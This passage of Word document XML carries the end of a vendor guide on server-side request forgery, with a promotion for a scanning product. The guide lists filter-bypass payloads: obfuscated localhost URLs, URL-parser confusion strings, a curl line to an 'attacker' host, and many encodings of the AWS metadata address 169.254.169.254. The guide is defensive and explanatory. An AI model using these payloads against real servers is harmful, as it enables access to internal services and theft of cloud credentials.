          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⓪</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⓪</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789127BF" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⓵⓶⓻</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⓪</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⓪</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⓵</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AEB05C" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With bash variables (cURL only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0C1DF" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>curl -v "http://attacker$google.com"; $google = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0A32A6" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Against weak parsers (these go to http://127.2.2.2:80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2145CB58" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.1.1.1:80@127.2.2.2:80/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D96BBEC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.1.1.1:80@@127.2.2.2:80/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4151D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.1.1.1:80:@@127.2.2.2:80/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199AE536" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.1.1.1:80#@127.2.2.2:80/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6657FCC4" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bypass 169.254.169.254 Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888D53A" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The most common bypass for AWS addresses is changing them to get past the blacklist of 169.245.169.254.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468ECBD" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://169.254.169.254.xip.io/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184EB9E6" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://1ynrnhl.xip.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E589D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://425.510.425.510 – dotted decimal with overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA5162" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://2852039166 – dotless decimal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370E7FC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://7147006462 – dotless decimal with overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8057AE" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0xA9.0xFE.0xA9.0xFE – dotted hexadecimal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB0A3B2" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0xA9FEA9FE – dotless hexadecimal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6684DCAC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0x41414141A9FEA9FE – dotless hexadecimal with overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121299D0" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0251.0376.0251.0376 – dotted octal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA3868B" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://0251.00376.000251.0000376 – dotted octal with padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D755D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF Protection with Bright</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C35CC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bright helps automate the detection and remediation of many vulnerabilities including SSRF, early in the development process, across web applications and APIs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE891BF" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>By shifting DAST scans left, and integrating them into the SDLC, developers and application security professionals can detect vulnerabilities early, and remediate them before they appear in production. Bright completes scans in minutes and achieves zero false positives, by automatically validating every vulnerability. This allows developers to adopt the solution and use it throughout the development lifecycle. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012C46E6" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scan any web app, or REST and GraphQL APIs to prevent SSRF vulnerabilities with Bright!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA8986F" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>See Additional Guides on Key Application Security Topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC9A9D" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Together with our content partners, we have authored in-depth guides on several other topics that can also be useful as you explore the world of </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>application security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF45889" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Vulnerability Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BF53351" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Authored by Bright Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BEA96F" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Vulnerability Management: Lifecycle, Tools, and Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1576B64F" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Vulnerability Examples: Common Types and 5 Real World Examples</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="063CA3E8" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Vulnerability Testing: Methods, Tools, and 10 Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F68BF64" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>API Security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50833D70" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Authored by Bright Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D8D0EC" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>What Is API security? The Complete Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79D3C266" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>REST API Testing: The Basics and 8 API Testing Tips</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BD5CCFF" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>WS-Security: Is It Enough to Secure Your SOAP Web Services?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64263BE9" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>LFI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29D53B5A" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2C15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Authored by Bright Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7452C023" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Local File Inclusion: Understanding and Preventing Attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25A1F3C1" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>File Inclusion Vulnerabilities: What are they and how do they work?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51110276" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15" w:rsidP="007F2C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="007F2C15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>LFI Attack: Real Life Attacks and Attack Examples</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="093B2144" w14:textId="43A26463" w:rsidR="007F2C15" w:rsidRDefault="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEE47B" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRDefault="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A214C2A" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRDefault="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EEF753" w14:textId="77777777" w:rsidR="007F2C15" w:rsidRPr="007F2C15" w:rsidRDefault="007F2C15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F37149" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRDefault="000F7A6D"/>
    <w:sectPr w:rsidR="000F7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E7C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4608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43B98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4B4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A13D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8860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E6931"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E9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438B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D45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745F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44F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B3BAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6254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A5A45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B62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B438F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA403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329E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10B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E7ADB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA5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36E22"/>
    <w:multiLevelType w:val="multilevel"/>
